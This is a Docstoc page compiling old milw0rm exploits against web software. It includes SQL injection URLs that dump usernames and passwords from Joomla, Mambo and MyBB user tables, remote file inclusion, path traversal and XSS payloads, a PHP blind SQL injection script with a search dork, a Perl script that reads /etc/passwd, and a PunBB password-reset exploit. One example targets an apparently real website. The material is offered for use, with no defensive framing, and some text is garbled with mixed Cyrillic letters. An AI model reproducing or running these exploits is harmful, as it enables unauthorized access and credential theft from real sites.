Docstoc

exploits

Document Sample
exploits Powered By Docstoc
					# joomla SQL Injection(com_gallery)
EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-
99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,us
ername/**/from/**/mos_users/*

EXPLOФАT 2 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-
999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0
%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_us
ers

# joomla SQL Injection(com_mcquiz)
ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xx
x&tid= [EXPLOФАT]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat
(username,0x3a,password),0x3a/**/from/**/jos_users/*

EXPLOФАT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a
,password)/**/from/**/mos_users/*

Mambo
/index.php?option=com_quran&action=viewayat&surano=-
1+union+all+select+1,concat(username,0x3a,password
),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-
1+union+all+select+1,concat(username,0x3a,password
),3,4,5+from+jos_users+limit+0,20--

Mambo Simpleboard Forum Component 1.0.3 Stable
(com_simpleboard)
Exploit:
http://site.com/index.php?option=com_simpleboard&func=view&catid=-
999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_us
ers/*
# Mambo Component com_accombo 1.X SQL Injection
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-
99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0
x3a,password)/**/from/**/mos_users/*
Joomla Component MyAlbum            1.0 SQL Injection
Vulnerability
Example:

http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-
1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/
*
[o] Online FlashQuiz<= 1.0.2 Remote File Inclusion
Vulnerability
[o] Exploit
  |
  |
http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc
.php?base_dir=[evilcode]        |
  |

MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL
Injection Vulnerability
Example:
#
#
http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x20
2d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
#
ExBB <= 0.22
# Example:
 GET
site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../.
./../[File]%00   #
 GET
site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../.
./install.php%00 #

 POST site.it/Ex/modules/threadstop/threadstop.php?
new_exbb[home_path]=http://www.google.it?      #
 POST site.it/Ex/modules/threadstop/threadstop.php?
exbb[home_path]=http://www.yoursite.com/page? #

Joomla and Mambo Component joomlaxplorer <=1.6.2
exploit =>
target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=../.
./[directory]

example :

site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2
F..%2F..%2F%2F..%2F..%2Fetc

site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2
F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

exploit =>
target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx
&order=name&srt=yes&error=[XSS]

example :
www.target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=
hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Joomla and Mambo Component com_extplorer
exploit =>
target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[d
irectory]

example :
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%
2F..%2F%2F..%2F..%2Fetc

site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%
2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed



Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit

<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#     Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit
#
#         Vulnerability discovered by: Lidloses_Auge
#         Exploit coded by:            Lidloses_Auge
#         Greetz to:                   Free-Hack, GPM
#         Date:                        13.04.2008
#
###############################################################
#
#         Dork: "mumbo jumbo media" + inurl:"index.php"
#         Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID]
#         Example for "http://www.site.com/cms/index.php?id=300"
#         => php '.$argv[0].' http://www.site.com/cms/ 300 1
#
###############################################################
');
if ($argc > 1) {
print_r('
');
    echo 'Searching for Admin: ';
    for($i=1; $i <= 50; $i++) {
        $temp1 =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kenn
ung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--');
        if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) {
            $adlen = $i;
            $i = 50;
        }
    }
    for($i=1; $i <= $adlen; $i++) {
        for($zahl=48; $zahl <= 122; $zahl++) {
            $temp =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((se
lect+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
            if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
                echo chr($zahl);
                $zahl = 122;
            }
            if ($zahl == 57) {
                $zahl = 96;
            }
        }
    }
print_r('
');
    echo 'Searching for Hash: ';
    for($i=1; $i <= 32; $i++) {
      for($zahl=48; $zahl <= 102; $zahl++) {
         if ($check = 0) {
            $temp2 =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((se
lect+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--');
            if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0)
{
               $zahl = 97;
               $check = 1;
            }
         }
         $temp =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((se
lect+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
         if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
            echo chr($zahl);
            $zahl = 102;
         }
         if ($zahl == 57) {
            $zahl = 97;
         }
      }
      $check = 0;
   }
}
?>

# milw0rm.com [2008-04-13]




phpBB Module XS 2.3.1 Local File Inclusion Expl
           ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
           .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
           ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
           .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
           ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
           .................................................................

[+] Software: phpBB Module XS 2.3.1
[+] Vendor: http://www.phpbbmods.de
[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3

[~]   Vulnerability found by: bd0rk
[~]   Contact: bd0rk[at]hackermail.com
[~]   Website: http://www.soh-crew.it.tt
[~]   Greetings: str0ke, TheJT, maria

[+] Vulnerable Code in /admin/admin_xs.php line 33
[+] Code: include_once('xs_include.' . $phpEx);
[+] It is a local file inclusion

[+]Exploitcode:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print   "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
print   "\t\t+                                                 +\n\n";
print   "\t\t+ phpBB Module XS 2.3.1 Local File Inclusion Expl +\n\n";
print   "\t\t+                                                 +\n\n";
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";

if (!$ARGV[0])
{
print "Usage: expl.pl [target]\n";
print "Example: expl.pl http://127.0.0.1/directory/admin/\n";
}

else
{
$web=$ARGV[0];
chomp $web;

$file="admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc
/passwd%00";

my $web1=$web.$file;
print "$web1\n\n";
my $agent = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $agent->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "This is vulnerable\n";
}
else
{
print "It is not vulnerable\n";
}
}

# milw0rm.com [2008-03-24]




Punbb <= 1.2.16
<?php
/**
 * Original : http://sektioneins.de/advisories/SE-2008-01.txt
 * Thanks to Stefan Esser, here's the exploit.
 *
 * Team : EpiBite
 * firefox, petit-poney, thot
 * Nous tenons a remercier nos mamans et papas respectifs.
 * Let's get a fu*** coffee !
 */

// conf
define('URL', 'http://localhost/punbb_1-2-16_fr/upload');       // base url
define('EMAIL', 'login_x@epitech.net');                                 // your
email
define('LOGIN', 'login_x');                                     // your login
define('PASS', '620553.8I73');                                  // your pass
// Exploit
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL,
URL.'/userlist.php?username=&show_group=-
1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
define('ADMIN', $m[2]);
preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s,
$m);
if (count($m))
  define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
else
  define('DATE', time() - 86400); //just in case, the forum or account just
has been created
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',

'req_email='.urlencode(EMAIL),

'request_pass=Envoyer')));
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set
manually if there's problem)
printf("Admin mail : %s\n--\n", ADMIN_MAIL);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_COOKIE,
'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',

'req_email='.urlencode(ADMIN_MAIL),

'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
                                                     'redirect_url=index.php',
                                                     'req_username='.LOGIN,
                                                     'req_password='.PASS)));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_LOGGUED', $c[1]);
printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);
define('PASS_MD5ED', sha1(PASS));
$chars = array('/', '-', "\\", '|');
for ($p = 0; $p < 86400 * 2; $p++)
{
  if (!($p % 300))
    echo $chars[($p / 300) % 4]."\r";
  if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
-8).PASS_MD5ED)) == 0)
    {
      define('SEED', substr(md5(DATE + $p), -8));
      break;
    }
}
printf("Seed : %s\n--\n", SEED);
for ($p = 0; $p < 1000000; $p++)
{
  if (!($p % 300))
    echo $chars[($p / 300) % 4]."\r";
  mt_srand((double)$p);
  if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
    {
      define('SRAND', $p);
      break;
    }
}
printf("SRAND : %s\n--\n", SRAND);
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);// Id
is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);
function random_pass($len)
{
  $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  $password = '';
  for ($i = 0; $i < $len; ++$i)
    $password .= substr($chars, (mt_rand() % strlen($chars)), 1);
  return $password;
}

# milw0rm.com [2008-02-21]

				
DOCUMENT INFO